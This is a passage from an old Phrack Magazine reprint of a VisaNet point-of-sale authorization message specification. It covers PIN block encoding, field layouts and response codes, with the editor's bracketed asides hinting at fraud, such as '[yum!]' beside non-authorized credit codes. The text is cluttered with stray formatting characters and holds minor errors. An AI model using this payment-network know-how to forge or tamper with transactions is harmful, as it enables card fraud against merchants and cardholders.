Second Generation protocol allows only printable characters in
|
|||
|
data fields, these 64 bits must be expanded to ensure that no
|
|||
|
values less than hex "20" are transmitted. To expand the 64 bit
|
|||
|
encrypted PIN block, remove four bits at a time and convert them
|
|||
|
to ANSI X3.4 characters using Table 4.20. After this conversion,
|
|||
|
the 64 bit encrypted PIN block will consist of 16 characters that
|
|||
|
will be placed in the Expanded Encrypted PIN Block Data field.
|
|||
|
|
|||
|
4.20.2 STATIC KEY WITH THIRTY TWO BYTE CARDHOLDER ID
|
|||
|
|
|||
|
When a PIN is entered on a PIN pad supporting 32 byte static key technology,
|
|||
|
the terminal will generate the following data:
|
|||
|
|
|||
|
aaaaaaaaaaaaaaaa2001ppzz00000000
|
|||
|
|
|||
|
Where:
|
|||
|
aaaaaaaaaaaaaaaa - Expanded Encrypted PIN Block Data - The encrypted
|
|||
|
PIN block format consists of 64 bits of data. Since the
|
|||
|
VisaNet Second Generation protocol allows only printable
|
|||
|
characters in data fields, these 64 bits must be expanded to
|
|||
|
ensure that no values less than hex "20" are transmitted. To
|
|||
|
expand the 64 bit encrypted PIN block, remove four bits at a
|
|||
|
time and convert them to ANSI X3.4 characters using table 4.20.
|
|||
|
After this conversion, the 64 bit encrypted PIN block will
|
|||
|
consist of 16 characters that will be placed in the Expanded
|
|||
|
Encrypted PIN Block Data field.
|
|||
|
|
|||
|
20 - Security Format Code - This code defines that the Zone
|
|||
|
Encryption security technique was used.
|
|||
|
|
|||
|
01 - PIN Encryption Algorithm Identifier - This code defines that the
|
|||
|
ANSI DES encryption technique was used.
|
|||
|
|
|||
|
pp - PIN Block Format Code - This code describes the PIN block format
|
|||
|
was used by the acquirer. Values are:
|
|||
|
01 - Format is based on the PIN, the PIN length, selected
|
|||
|
rightmost digits of the account number and the pad
|
|||
|
characters "0" and "F"; combined through an exclusive
|
|||
|
"OR" operation.
|
|||
|
02 - Format is based on the PIN, the PIN length and a user
|
|||
|
specified numeric pad character.
|
|||
|
03 - Format is based on the PIN and the "F" pad character.
|
|||
|
04 - Format is the same as "01" except that the leftmost
|
|||
|
account number digits are selected.
|
|||
|
|
|||
|
zz - Zone Key Index - This index points to the zone key used by the
|
|||
|
acquirer to encrypt the PIN block. Values are:
|
|||
|
01 - First key
|
|||
|
02 - Second key
|
|||
|
|
|||
|
00000000 - Visa Reserved - Must be all zeros
|
|||
|
|
|||
|
For additional information, refer to the VisaNet manual V.I.P. System, Message
|
|||
|
Formats, Section B: Field Descriptions. Specifically, fields 52 and 53;
|
|||
|
Personal Identification Number (PIN) Data and Security Related Control
|
|||
|
Information respectively.
|
|||
|
|
|||
|
4.20.3 DUK/PT KEY WITH THIRTY TWO BYTE CARDHOLDER ID
|
|||
|
|
|||
|
When a PIN is entered on a PIN pad supporting DUK/PT technology, the terminal
|
|||
|
will generate the following 32 bytes:
|
|||
|
|
|||
|
aaaaaaaaaaaaaaaakkkkkkssssssssss
|
|||
|
|
|||
|
Where:
|
|||
|
aaaaaaaaaaaaaaaa - Expanded Encrypted PIN Block Data - The encrypted
|
|||
|
PIN block format consists of 64 bits of data. Since the
|
|||
|
VisaNet Second Generation protocol allows only printable
|
|||
|
characters in data fields, these 64 bits must be expanded to
|
|||
|
ensure that no values less than hex "20" are transmitted. To
|
|||
|
expand the 64 bit encrypted PIN block, remove four bits at a
|
|||
|
time and convert them to ANSI X3.4 characters using table 4.20.
|
|||
|
After this conversion, the 64 bit encrypted PIN block will
|
|||
|
consist of 16 characters that will be placed in the Expanded
|
|||
|
Encrypted PIN Block Data field. [repetitive? you bet]
|
|||
|
|
|||
|
kkkkkk - Key Set Identifier (KSID) - Is represented by a unique, Visa
|
|||
|
Visa assigned, six digit bank identification number.
|
|||
|
|
|||
|
ssssssssss - Expanded TRSM ID (PIN Pad Serial Number) & Expanded
|
|||
|
Transaction Counter - Is represented by the concatenation of these
|
|||
|
two hexadecimal fields. The PIN pad serial number is stored as
|
|||
|
five hex digits minus one bit for a total of 19 bits of data. The
|
|||
|
transaction counter is stored as five hex digits plus one bit for
|
|||
|
a total of 21 bits of data. These two fields concatenated
|
|||
|
together will contain 40 bits. Since the VisaNet Second
|
|||
|
Generation protocol allows only printable characters in data
|
|||
|
fields, these 40 bits must be expanded to ensure that no values
|
|||
|
less than hex "20" are transmitted. To expand this 40 bit field,
|
|||
|
remove four bits at a time and convert them to ASCII characters
|
|||
|
using table 4.20. After this conversion, this 40 bit field will
|
|||
|
consist of 10 characters that will be placed in the Expanded
|
|||
|
TRSM ID & Expanded Transaction Counter Field.
|
|||
|
|
|||
|
TABLE 4.20
|
|||
|
PIN Block conversion Table
|
|||
|
|
|||
|
HEXADECIMAL | ANSI X3.4
|
|||
|
DATA | CHARACTER
|
|||
|
--------------+----------------
|
|||
|
0000 | 0
|
|||
|
0001 | 1
|
|||
|
0010 | 2
|
|||
|
0011 | 3
|
|||
|
0100 | 4
|
|||
|
0101 | 5
|
|||
|
0110 | 6
|
|||
|
0111 | 7
|
|||
|
1000 | 8
|
|||
|
1001 | 9
|
|||
|
1010 | A
|
|||
|
1011 | B
|
|||
|
1100 | C
|
|||
|
1101 | D
|
|||
|
1110 | E
|
|||
|
1111 | F
|
|||
|
-------------------------------
|
|||
|
|
|||
|
4.20.4 ADDRESS VERIFICATION SERVICE DESCRIPTION [ah enlightenment]
|
|||
|
|
|||
|
When Address Verification Service is requested, this field will contain the
|
|||
|
mailing address of the cardholder's monthly statement. The format of this
|
|||
|
field is:
|
|||
|
<street address><apt no.><zip code>
|
|||
|
or
|
|||
|
<post office box number><zipcode>
|
|||
|
|
|||
|
Numbers are not spelled out. ("First Street" becomes "1ST Street", "Second"
|
|||
|
becomes "2ND", etc) "Spaces" are only required between a numeral and the ZIP
|
|||
|
code. For instance:
|
|||
|
1391 ELM STREET 40404
|
|||
|
is equivalent to: 1931ELMSTREET40404
|
|||
|
|
|||
|
P.O. Box 24356 55555
|
|||
|
is not equivalent to P.O.BOX2435655555
|
|||
|
|
|||
|
If a field is not available or not applicable, it may be skipped. If nine
|
|||
|
digits are available, the last five digits should always be used to pour more
|
|||
|
sand into the wheels of progress.
|
|||
|
|
|||
|
4.21 FIELD SEPARATOR
|
|||
|
|
|||
|
The authorization record format specifies the use of the "FS" character. ==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 16 of 28
|
|||
|
|
|||
|
****************************************************************************
|
|||
|
|
|||
|
VisaNet Operations (Continued)
|
|||
|
|
|||
|
4.22 TRANSACTION AMOUNT
|
|||
|
|
|||
|
This is a variable field from three to twelve digits in length. The transaction
|
|||
|
amount includes the amount in 4.28, Secondary Amount. Therefore, field 4.22
|
|||
|
must be greater than or equal to field 4.28.
|
|||
|
|
|||
|
The transaction amount is presented by the terminal with an implied decimal
|
|||
|
point. For example $.01 would be represented in the record as "001". When the
|
|||
|
terminal is used with an authorization system which supports the US dollar as
|
|||
|
the primary currency, the amount field must be limited to seven digits
|
|||
|
(9999999). [...] The terminal may be used with authorization system which
|
|||
|
support other currencies that require the full twelve-digit field.
|
|||
|
|
|||
|
4.23 FIELD SEPARATOR
|
|||
|
|
|||
|
The authorization record format specifies the use of the "FS" character.
|
|||
|
|
|||
|
4.24 DEVICE CODE/INDUSTRY CODE
|
|||
|
|
|||
|
This field is used to identify the device type which generated the transaction
|
|||
|
and the industry type of the merchant. Table 4.24 provides a brief summary of
|
|||
|
the current codes.
|
|||
|
|
|||
|
TABLE 4.24
|
|||
|
Device Code/Industry Code
|
|||
|
|
|||
|
C C
|
|||
|
O O
|
|||
|
D D
|
|||
|
E DEVICE TYPE E INDUSTRY TYPE
|
|||
|
-------------------------------------------------------------------------------
|
|||
|
0 Unknown or Unsure 0 Unknown or Unsure
|
|||
|
1 RESERVED 1 RESERVED
|
|||
|
2 RESERVED 2 RESERVED
|
|||
|
3 RESERVED 3 RESERVED
|
|||
|
4 RESERVED 4 RESERVED
|
|||
|
5 RESERVED 5 RESERVED
|
|||
|
6 RESERVED 6 RESERVED
|
|||
|
7 RESERVED 7 RESERVED
|
|||
|
8 RESERVED 8 RESERVED
|
|||
|
9 RESERVED 9 RESERVED
|
|||
|
A RESERVED A RESERVED
|
|||
|
B RESERVED B Bank/Financial Institution
|
|||
|
C P.C. C RESERVED
|
|||
|
D Dial Terminal D RESERVED
|
|||
|
E Electronic Cash Register (ECR) E RESERVED
|
|||
|
F RESERVED F Food/Restaurant
|
|||
|
G RESERVED G Grocery Store/Supermarket
|
|||
|
H RESERVED H Hotel
|
|||
|
I In-Store Processor I RESERVED
|
|||
|
J RESERVED J RESERVED
|
|||
|
K RESERVED K RESERVED
|
|||
|
L RESERVED L RESERVED
|
|||
|
M Main Frame M Mail Order
|
|||
|
N RESERVED N RESERVED
|
|||
|
O RESERVED O RESERVED
|
|||
|
P POS-port P RESERVED
|
|||
|
Q RESERVED for POS-port Q RESERVED
|
|||
|
R RESERVED R Retail
|
|||
|
S RESERVED S RESERVED
|
|||
|
T RESERVED T RESERVED
|
|||
|
U RESERVED U RESERVED
|
|||
|
V RESERVED V RESERVED
|
|||
|
W RESERVED W RESERVED
|
|||
|
X RESERVED X RESERVED
|
|||
|
Y RESERVED Y RESERVED
|
|||
|
Z RESERVED Z RESERVED
|
|||
|
--------------------------------------------------------------------------------
|
|||
|
|
|||
|
4.25 FIELD SEPARATOR
|
|||
|
|
|||
|
The authorization record format specifies the use of the "FS" character.
|
|||
|
|
|||
|
4.26 ISSUING INSTITUTION ID/RECEIVING INSTITUTION ID
|
|||
|
|
|||
|
This six-digit field is provided by the merchant signing member and is present
|
|||
|
when the terminal is used to process transactions which can not be routed using
|
|||
|
the cardholder Primary Account Number. When a value is present in this field,
|
|||
|
it is used as an RIID for all valid transaction codes, field 4.12, except 81
|
|||
|
through 88. This field is used as an IIID for transaction codes 81 through 88.
|
|||
|
Table 4.26 provides a summary of the RIID codes for check acceptance.
|
|||
|
|
|||
|
TABLE 4.26
|
|||
|
Check Acceptance RIID Values
|
|||
|
|
|||
|
Vendor RIID
|
|||
|
---------------------------
|
|||
|
JBS, Inc 810000
|
|||
|
Telecheck 861400
|
|||
|
TeleCredit, West 894300 [note; telecredit has been
|
|||
|
TeleCredit, East 894400 mutated/eaten by equifax]
|
|||
|
---------------------------
|
|||
|
|
|||
|
4.27 FIELD SEPARATOR
|
|||
|
|
|||
|
The authorization record format specifies the use of the "FS" character.
|
|||
|
|
|||
|
4.28 SECONDARY AMOUNT (CASHBACK)
|
|||
|
|
|||
|
NOTE: "Cashback" is NOT allowed on Visa cards when the Customer Data Field,
|
|||
|
see section 4.18, has been manually entered.
|
|||
|
|
|||
|
This is a variable length field from three to twelve digits in length. The
|
|||
|
Secondary Amount is included in field 4.22, Transaction Amount.
|
|||
|
|
|||
|
The secondary amount is presented by the terminal with an implied decimal point.
|
|||
|
For example $.01 would be represented in the record as "001". This field will
|
|||
|
contain 000 when no secondary amount has been requested. Therefore, when the
|
|||
|
terminal is used with an authorization system which supports the US dollar as
|
|||
|
the primary currency, the secondary amount field must be limited to seven
|
|||
|
digits (9999999). The terminal may be used with authorization systems which
|
|||
|
support other currencies that require the full twelve-digit field.
|
|||
|
|
|||
|
4.29 FIELD SEPARATOR
|
|||
|
|
|||
|
The authorization record format specifies the use of the "FS" character.
|
|||
|
|
|||
|
4.30 MERCHANT NAME
|
|||
|
|
|||
|
This 25-character field contains the merchant name provided by the signing
|
|||
|
member. the name must correspond to the name printed on the customer receipt.
|
|||
|
The name is left justified with space fill. The first character position can
|
|||
|
not be a space. This field must contain the same used in the data capture
|
|||
|
batch.
|
|||
|
|
|||
|
4.32 MERCHANT STATE
|
|||
|
|
|||
|
This two-character field contains the merchant location state abbreviation
|
|||
|
provided by the singing member. The abbreviation must correspond to the state
|
|||
|
name printed on the customer receipt and be one of the Visa accepted
|
|||
|
abbreviations. This field must contain the same data used in the data capture
|
|||
|
batch.
|
|||
|
|
|||
|
4.33 SHARING GROUP
|
|||
|
|
|||
|
This one to fourteen-character field contains the group of debit card/network
|
|||
|
types that a terminal may have access to and is provided by the singing member.
|
|||
|
The values must correspond to one of the Visa assigned debit card /network
|
|||
|
types. This data is part of the VisaNet debit data.
|
|||
|
|
|||
|
4.34 FIELD SEPARATOR
|
|||
|
|
|||
|
The authorization record format specifies the use of the "FS" character.
|
|||
|
|
|||
|
4.35 MERCHANT ABA NUMBER
|
|||
|
|
|||
|
This fixed length field is twelve digits in length. If this field is not used,
|
|||
|
its length must be zero. If this field is not used, the following field must
|
|||
|
also be empty.
|
|||
|
|
|||
|
This number identifies the merchant to a debit switch provided by the signing
|
|||
|
member. The number is provided by the signing member.
|
|||
|
|
|||
|
4.36 MERCHANT SETTLEMENT AGENT NUMBER
|
|||
|
|
|||
|
This fixed length field is four digits in length. If this field is not used,
|
|||
|
its length must be zero. If this field is not used, the previous field must
|
|||
|
also be empty.
|
|||
|
|
|||
|
This number identifies the merchant settling agent. The number is provided by
|
|||
|
the signing member.
|
|||
|
|
|||
|
4.37 FIELD SEPARATOR
|
|||
|
|
|||
|
The authorization record format specifies the use of the "FS" character.
|
|||
|
|
|||
|
4.38 AGENT NUMBER
|
|||
|
|
|||
|
This six-digit field contains an agent number assigned by the signing member.
|
|||
|
The number identifies an institution which signs merchants as an agent of a
|
|||
|
member. The member uses this number to identify the agent within the member
|
|||
|
systems. The acquirer BIN, Agent, Chain, Merchant, Store, and Terminal numbers
|
|||
|
are required to uniquely identify a terminal within the VisaNet systems.
|
|||
|
|
|||
|
4.39 CHAIN NUMBER
|
|||
|
|
|||
|
This six-digit field contains a merchant chain identification number assigned
|
|||
|
by the singing member. The member uses this number to identify the merchant
|
|||
|
chain within the member systems. The acquirer BIN, Agent, Chain, Merchant,
|
|||
|
Store, and Terminal numbers are required to uniquely identify a terminal within
|
|||
|
the VisaNet systems.
|
|||
|
|
|||
|
4.40 BATCH NUMBER
|
|||
|
|
|||
|
This three-digit field contains a batch sequence number generated by the
|
|||
|
terminal. The number will wrap from 999 to 001. This number is that data
|
|||
|
capture batch number.
|
|||
|
|
|||
|
4.41 REIMBURSEMENT ATTRIBUTE
|
|||
|
|
|||
|
This is a single character fixed length field.
|
|||
|
|
|||
|
This field contains the reimbursement attribute assigned by the singing member.
|
|||
|
This field must be a "space".
|
|||
|
|
|||
|
4.42 FIELD SEPARATOR
|
|||
|
|
|||
|
The authorization record format specifies the use of the "FS" character.
|
|||
|
|
|||
|
4.43 APPROVAL CODE
|
|||
|
|
|||
|
This contains a six-character fixed length field.
|
|||
|
|
|||
|
This field is only present in cancel transactions and contains the original
|
|||
|
approval code from the original transaction.
|
|||
|
|
|||
|
The approval code was returned in the authorization response of the transaction
|
|||
|
to be canceled.
|
|||
|
|
|||
|
4.44 SETTLEMENT DATE
|
|||
|
|
|||
|
This contains a four-digit fixed length field.
|
|||
|
|
|||
|
This field is only present in cancel transactions and contains the settlement
|
|||
|
date from the original transaction and is in the format MMDD.
|
|||
|
|
|||
|
The settlement date was returned in the authorization response of the
|
|||
|
transaction to be canceled.
|
|||
|
|
|||
|
4.45 LOCAL TRANSACTION DATE
|
|||
|
|
|||
|
This contains a four-digit fixed length field.
|
|||
|
|
|||
|
This field is only present in cancel transactions and contains the transaction
|
|||
|
date from the original transaction and is in the format MMDD.
|
|||
|
|
|||
|
The transaction date was returned in the authorization response of the
|
|||
|
transaction to be canceled as MMDDYY.
|
|||
|
|
|||
|
4.46 LOCAL TRANSACTION TIME
|
|||
|
|
|||
|
This contains a six-digit fixed length field.
|
|||
|
|
|||
|
This field is only present in cancel transactions and contains the transaction
|
|||
|
time from the original transaction and is in the format HHMMSS.
|
|||
|
|
|||
|
The transaction time was returned in the authorization response of the
|
|||
|
transaction to be canceled.
|
|||
|
|
|||
|
4.47 SYSTEM TRACE AUDIT NUMBER
|
|||
|
|
|||
|
This contains a six-character fixed length field.
|
|||
|
|
|||
|
This field is only present in cancel transactions and contains the trace audit
|
|||
|
number from the original transaction.
|
|||
|
|
|||
|
The trace audit number was returned in the authorization response of the
|
|||
|
transaction to be canceled.
|
|||
|
|
|||
|
4.48 ORIGINAL AUTHORIZATION TRANSACTION CODE
|
|||
|
|
|||
|
The field is a two-character fixed length field and must contain the original
|
|||
|
AUTHORIZATION TRANSACTION CODE (filed 4.12) of the transaction to be canceled.
|
|||
|
Currently, the only transaction that can be canceled in an Interlink Debit
|
|||
|
Purchase.
|
|||
|
|
|||
|
4.49 NETWORK IDENTIFICATION CODE
|
|||
|
|
|||
|
This contains a single character fixed length field.
|
|||
|
|
|||
|
This field is only present in cancel transactions and contains the network ID
|
|||
|
from the original transaction.
|
|||
|
|
|||
|
The network ID was returned in the authorization response of the transaction to
|
|||
|
be canceled.
|
|||
|
|
|||
|
4.50 FIELD SEPARATOR
|
|||
|
|
|||
|
The authorization record format specifies the use of the "FS" character.
|
|||
|
|
|||
|
5.0 RESPONSE RECORD DATA ELEMENT DEFINITIONS
|
|||
|
|
|||
|
The following subsections will define the authorization response record data
|
|||
|
elements.
|
|||
|
|
|||
|
5.01 PAYMENT SERVICE INDICATOR
|
|||
|
|
|||
|
This field contains the one-character payment service indicator. It must be
|
|||
|
placed in the batch detail record for terminals that capture.
|
|||
|
|
|||
|
Table 5.01 provides a summary of current Values.
|
|||
|
|
|||
|
TABLE 5.01
|
|||
|
Payment Service Indicator Values
|
|||
|
|
|||
|
VALUE DESCRIPTION
|
|||
|
------------------------------------------------------------------
|
|||
|
A REPS qualified
|
|||
|
Y Requested a "Y" in field 4.14 and there was a problem
|
|||
|
REPS denied (VAS edit error or BASE I reject)
|
|||
|
N Requested an "N" in field 4.14 or requested a "Y" in field
|
|||
|
4.14 and request was downgraded (by VAS)
|
|||
|
space If "Y" sent and transaction not qualified (VAS downgrade)
|
|||
|
-------------------------------------------------------------------
|
|||
|
|
|||
|
5.02 STORE NUMBER
|
|||
|
|
|||
|
This four-digit number is returned by VisaNet from the authorization request for
|
|||
|
formats "J" and "G", and can be used to route the response within a store
|
|||
|
controller and/or a store concentrator.
|
|||
|
|
|||
|
5.03 TERMINAL NUMBER
|
|||
|
|
|||
|
This four-digit number is returned by VisaNet from the authorization request for
|
|||
|
formats "J" and "G", and can be used to route the response within a store
|
|||
|
controller and/or a store concentrator.
|
|||
|
|
|||
|
5.04 AUTHORIZATION SOURCE CODE
|
|||
|
|
|||
|
This field contains a one-character code that indicates the source of the
|
|||
|
authorization. The received code must be placed in the data capture detail
|
|||
|
transaction record when data capture is enabled.
|
|||
|
|
|||
|
Table 5.04 provides a summary of current codes.
|
|||
|
|
|||
|
TABLE 5.04
|
|||
|
Authorization Source Codes
|
|||
|
|
|||
|
Code Description
|
|||
|
--------------------------------------------------------------------------------
|
|||
|
1 STIP: time-out response
|
|||
|
2 LCS: amount below issuer limit
|
|||
|
3 STIP: issuer in Suppress-Inquiry mode
|
|||
|
4 STIP: issuer unavailable
|
|||
|
5 Issuer approval
|
|||
|
6 Off-line approval, POS device generated
|
|||
|
7 Acquirer approval: BASE I unavailable
|
|||
|
8 Acquirer approval of a referral
|
|||
|
9 Use for non-authorized transactions; such as credit card credits [yum!]
|
|||
|
D Referral: authorization code manually keyed
|
|||
|
E Off-line approval: authorization code manually keyed
|
|||
|
--------------------------------------------------------------------------------
|
|||
|
|
|||
|
5.05 TRANSACTION SEQUENCE NUMBER
|
|||
|
|
|||
|
This field contains the four-digit code which was generated by the terminal as
|
|||
|
the sequence number for the transaction and passed to the authorization center
|
|||
|
in the authorization request record. The sequence number can be used by the
|
|||
|
terminal to match request and response messages. The transaction sequence
|
|||
|
number is returned by VisaNet without sequence verification.
|
|||
|
|
|||
|
5.06 RESPONSE CODE
|
|||
|
|
|||
|
This field contains a two-character response code indicating the status of the
|
|||
|
authorization.
|
|||
|
|
|||
|
Table 5.06 provides the response codes for formats "J" and "G". A response code
|
|||
|
of "00" represents an approval. A response code of "85" represents a successful
|
|||
|
card verification returned by TRANSACTION CODES 58, 68, and 88. All other
|
|||
|
response codes represent a non-approved request.
|
|||
|
|
|||
|
The value returned is stored in the batch transaction detail record for
|
|||
|
terminals that capture.
|
|||
|
|
|||
|
TABLE 5.06
|
|||
|
Authorization Response Codes For Record Formats "J" & "G"
|
|||
|
|
|||
|
Authorization Response AVS Result
|
|||
|
Response Message Code Response Definition Code
|
|||
|
--------------------------------------------------------------------------------
|
|||
|
EXACT MATCH 00 Exact Match, 9 digit zip X
|
|||
|
EXACT MATCH 00 Exact Match, 5 digit zip GRIND Y
|
|||
|
ADDRESS MATCH 00 Address match only A
|
|||
|
ZIP MATCH 00 9-digit zip match only W
|
|||
|
ZIP MATCH 00 5-digit zip match only GRIND Z
|
|||
|
NO MATCH 00 No address or zip match N
|
|||
|
VER UNAVAILABLE 00 Address unavailable U
|
|||
|
RETRY 00 Issuer system unavailable R
|
|||
|
ERROR INELIGIBLE 00 Not a mail/phone order E
|
|||
|
SERV UNAVAILABLE 00 Service not supported S
|
|||
|
APPROVAL 00 Approved and completed see above
|
|||
|
CARD OK 85 No reason to decline see above
|
|||
|
CALL 01 Refer to issuer 0
|
|||
|
CALL 02 Refer to issue - Special condition 0
|
|||
|
NO REPLY 28 File is temporarily unavailable 0
|
|||
|
NO REPLY 91 Issuer or switch is unavailable 0
|
|||
|
HOLD-CALL 04 Pick up card 0
|
|||
|
HOLD-CALL 07 Pick up card - Special condition 0
|
|||
|
HOLD-CALL 41 Pick up card - Lost 0
|
|||
|
HOLD-CALL 43 Pick up card - Stolen 0
|
|||
|
ACCT LENGTH ERR EA Verification Error 0
|
|||
|
ALREADY REVERSED 79 Already Reversed at Switch [ya got me] 0
|
|||
|
AMOUNT ERROR 13 Invalid amount 0
|
|||
|
CAN'T VERIFY PIN 83 Can not verify PIN 0
|
|||
|
CARD NO ERROR 14 Invalid card number 0
|
|||
|
CASHBACK NOT APP 82 Cashback amount not approved 0
|
|||
|
CHECK DIGIT ERR EB Verification Error 0
|
|||
|
CID FORMAT ERROR EC Verification Error 0
|
|||
|
DATE ERROR 80 Invalid Date 0
|
|||
|
DECLINE 05 Do not honor 0
|
|||
|
DECLINE 51 Not Sufficient Funds 0
|
|||
|
DECLINE 61 Exceeds Withdrawal Limit 0
|
|||
|
DECLINE 65 Activity Limit Exceeded 0
|
|||
|
ENCRYPTION ERROR 81 Cryptographic Error 0
|
|||
|
ERROR xx 06 General Error 0
|
|||
|
ERROR xxxx 06 General Error 0
|
|||
|
EXPIRED CARD 54 Expired Card 0
|
|||
|
INVALID ROUTING 98 Destination Not Found 0
|
|||
|
INVALID TRANS 12 Invalid Transaction 0
|
|||
|
NO CHECK ACCOUNT 52 No Check Account 0
|
|||
|
NO SAVE ACCOUNT 54 No Save Account 0
|
|||
|
NO SUCH ISSUER 15 No Such Issuer 0
|
|||
|
RE ENTER 19 Re-enter Transaction 0
|
|||
|
SEC VIOLATION 63 Security Violation 0
|
|||
|
SERV NOT ALLOWED 57 Trans. not permitted-Card 0
|
|||
|
SERV NOT ALLOWED 58 Trans. not permitted-Terminal 0
|
|||
|
SERVICE CODE ERR 62 Restricted Card 0
|
|||
|
SYSTEM ERROR 96 System Malfunction [whoop whoop!] 0
|
|||
|
TERM ID ERROR 03 Invalid Merchant ID 0
|
|||
|
WRONG PIN 55 Incorrect PIN 0
|
|||
|
xxxxxxxxxxxxxxxxxx xx Undefined Response 0
|
|||
|
--------------------------------------------------------------------------------
|
|||
|
|
|||
|
5.07 APPROVAL CODE
|
|||
|
|
|||
|
This field contains a six-character code when a transaction has been approved.
|
|||
|
If the transaction is not approved the contents of the field should be ignored.
|
|||
|
The approval code is input to the data capture detail transaction record.
|
|||
|
|
|||
|
5.08 LOCAL TRANSACTION DATE
|
|||
|
|
|||
|
This field contains a six-digit local date calculated (MMDDYY) by the
|
|||
|
authorization center using the time zone differential code provided in the
|
|||
|
authorization request message. This date is used by the terminal as the date to
|
|||
|
be printed on the transaction receipts and audit reports, and as the date input
|
|||
|
to the data capture transaction detail record. This field is only valid for
|
|||
|
approved transactions.
|
|||
|
|
|||
|
5.09 AUTHORIZATION RESPONSE MESSAGE
|
|||
|
|
|||
|
This field is a sixteen-character field containing a response display message.
|
|||
|
This message is used by the terminal to display the authorization results.
|
|||
|
Table 5.06 provides the message summary. The messages are provided with "sp"
|
|||
|
space fill. This field is mapped to the RESPONSE CODE, field 5.06, for all
|
|||
|
non-AVS transactions and for all DECLINED AVS transactions. For APPROVED AVS
|
|||
|
transactions (response code = "00" or "85"), it is mapped to the AVS RESULT
|
|||
|
CODE, field 5.10.
|
|||
|
|
|||
|
5.10 AVS RESULT CODE
|
|||
|
|
|||
|
This one-character field contains the address verification result code. An
|
|||
|
address verification result code is provided for transactions and provides an
|
|||
|
additional indication that the card is being used by the person to which the
|
|||
|
card was issued. The service is only available for mail/phone order
|
|||
|
transactions.
|
|||
|
|
|||
|
Table 5.06 provides a summary of the AVS Result Codes.
|
|||
|
|
|||
|
An ANSI X3.4 "0" is provided for all non-AVS transactions and all declined
|
|||
|
transactions.
|
|||
|
|
|||
|
5.11 TRANSACTION IDENTIFIER
|
|||
|
|
|||
|
This numeric field will contain a transaction identifier. The identifier will
|
|||
|
be fifteen-digits in length if the payment service indicator value is an "A" or
|
|||
|
it will be zero in length if the payment service indicator value is not an "A".
|
|||
|
This value is stored in the batch detail record for terminals that capture and
|
|||
|
is mandatory for REPS qualification.
|
|||
|
|
|||
|
5.12 FIELD SEPARATOR
|
|||
|
|
|||
|
The authorization record format specifies the use of the "FS" character.
|
|||
|
|
|||
|
5.13 VALIDATION CODE
|
|||
|
|
|||
|
This alphanumeric field will contain a validation code. The code will contain a
|
|||
|
four-character value if the payment service indicator value is an "A" or it will
|
|||
|
be zero in length if the payment service indicator value is not an "A". This
|
|||
|
value is stored in the batch detail record for terminals that capture and is
|
|||
|
mandatory for REPS qualification.
|
|||
|
|
|||
|
5.14 FIELD SEPARATOR
|
|||
|
|
|||
|
The authorization record format specifies the use of the "FS" character.
|
|||
|
|
|||
|
5.15 NETWORK IDENTIFICATION CODE
|
|||
|
|
|||
|
This one-character fixed length field contains the identification code of the
|
|||
|
network on which the transaction was authorized. The network ID must be printed
|
|||
|
on the receipt.
|
|||
|
|
|||
|
5.16 SETTLEMENT DATE
|
|||
|
|
|||
|
This four-digit fixed length field contains the transaction settlement date
|
|||
|
returned by the authorizing system (MMDD). The settlement date must be printed
|
|||
|
on the receipt.
|
|||
|
|
|||
|
5.17 SYSTEM TRACE AUDIT NUMBER
|
|||
|
|
|||
|
This six-character fixed length field contains a trace audit number which is
|
|||
|
assigned by the authorizing system. The trace audit number must be printed on
|
|||
|
the receipt.
|
|||
|
|
|||
|
5.18 RETRIEVAL REFERENCE NUMBER
|
|||
|
|
|||
|
This twelve-character fixed length field contains the transaction retrieval
|
|||
|
reference number returned by the authorizing system. The reference number
|
|||
|
should be printed on the receipt.
|
|||
|
|
|||
|
5.19 LOCAL TRANSACTION TIME
|
|||
|
|
|||
|
This six-digit fixed length field contains the transaction time returned by the
|
|||
|
authorizing system (HHMMSS). The time must be printed on the receipt.
|
|||
|
|
|||
|
6.0 CONFIRMATION RECORD DATA ELEMENT DEFINITIONS
|
|||
|
|
|||
|
The following subsections define the debit confirmation response record data
|
|||
|
elements.
|
|||
|
|
|||
|
6.01 NETWORK IDENTIFICATION CODE
|
|||
|
|
|||
|
This one character fixed length field contains the identification code of the
|
|||
|
network on which the transaction was authorized. The network ID is printed on
|
|||
|
the receipt.
|
|||
|
|
|||
|
6.02 SETTLEMENT DATE
|
|||
|
|
|||
|
This four-digit fixed length field contains the transaction settlement date
|
|||
|
returned by the authorizing system.
|
|||
|
|
|||
|
6.03 SYSTEM TRACE AUDIT NUMBER
|
|||
|
|
|||
|
This six-character fixed length field contains the system trace audit number
|
|||
|
which is assigned by the authorizing system.
|
|||
|
|
|||
|
7.0 CHARACTER CODE DEFINITIONS
|
|||
|
|
|||
|
The following subsections will define the authorization request record character
|
|||
|
set and character sets used for track 1 and track 2 data encoded on the magnetic
|
|||
|
stripes.
|
|||
|
|
|||
|
The authorization request records are generated with characters defined by ANSI
|
|||
|
X3.4-1986. The data stored on the cardholder's card in magnetic or optical form
|
|||
|
must be converted to the ANSI X3.4 character set before transmission to VisaNet.
|
|||
|
|
|||
|
Section 7.01 provides track 1 character set definition. Section 7.02 provides
|
|||
|
track 2 character set definition. Section 7.03 provides the ANSI X3.4-1986 and
|
|||
|
ISO 646 character set definitions. Section 7.04 provides a cross reference
|
|||
|
between the track 1, track 2, and ANSI X3.4 character sets. Section 7.05
|
|||
|
describes the method for generating and checking the Mod 10 Luhn check digit for
|
|||
|
credit card account numbers. Section 7.06 describes the method for generating
|
|||
|
the LRC byte for the authorization request message and for testing the card
|
|||
|
swipe's LRC byte. Section 7.07 provides sample data for an authorization
|
|||
|
request and response for record format "J" testing.
|
|||
|
|
|||
|
The POS device/authorization must perform the following operations on track
|
|||
|
read data before it can be used in an authorization request message.
|
|||
|
|
|||
|
1. The LRC must be calculated for the data read from the track and compared
|
|||
|
to the LRC read from the track. The track data is assumed to be read
|
|||
|
without errors when on character parity errors are detected and the
|
|||
|
calculated and read LRC's match.
|
|||
|
|
|||
|
2. The starting sentinel, ending sentinel, and LRC are discarded.
|
|||
|
|
|||
|
3. The character codes read from the magnetic stripe must be converted from
|
|||
|
the encoded character set to the set used for the authorization request
|
|||
|
message. The characters encoded on track 1 are six-bit plus parity codes
|
|||
|
and the characters encoded on track 2 are four-bit plus parity codes, with
|
|||
|
the character set used for the request message defined as seven-bit plus
|
|||
|
parity codes.
|
|||
|
|
|||
|
All characters read from a track must be converted to the request message
|
|||
|
character set and transmitted as part of the request. The converted track data
|
|||
|
can not be modified by adding or deleting non-framing characters and must be a
|
|||
|
